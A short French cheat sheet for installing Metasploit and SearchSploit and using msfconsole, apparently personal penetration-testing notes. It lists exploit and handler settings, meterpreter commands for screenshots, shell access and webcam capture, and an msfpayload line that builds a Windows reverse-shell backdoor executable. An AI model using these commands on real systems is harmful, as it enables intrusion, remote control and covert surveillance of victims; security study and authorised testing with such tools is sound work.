meta données pour cette page
Découverte de l'outil metasploit
Installation générale de metasploit
# vraiment eu comme utilité libpq5 libpq-dev libsqlite3-dev sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev cd /opt/ git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework gem install bundler bundle install sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
S'il y a des soucis de compilation de modules, il est très recommandé de regarder dans les log de compilation qui seront conseillé en fin de sortie de commande.
installation de SearchSploit
En seulement deux commandes :
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit
Il sera alors pas la suite possible de mettre à jours la base :
searchsploit -u
commandes disponibles
- Se connecter à l'interface :
msfconsole
- Mise à jour de la base :
msf update
- Mode msf
show exploits search name:smb type:exploit platform:windows use <exploit> set rhost 10.0.45.14 set rport 1234
- Mode exploit
show payloads set payload <payload> set lhost <ip_machine> set lport 4321 run //use <multi/handler>
- Mode Handler
exploit
- Mode meterpreter
sysinfo
ps
screenshot
shell
webcam_list
webcam_snap
webcam_stream
shutdown
msfpayload
msfpayload <windows/meterpreter/reverse_tcp HOST=192.168.0.125 PORT=4444 x > /usr/backdoor.exe
Donc création du payload avant de lancer l'exploit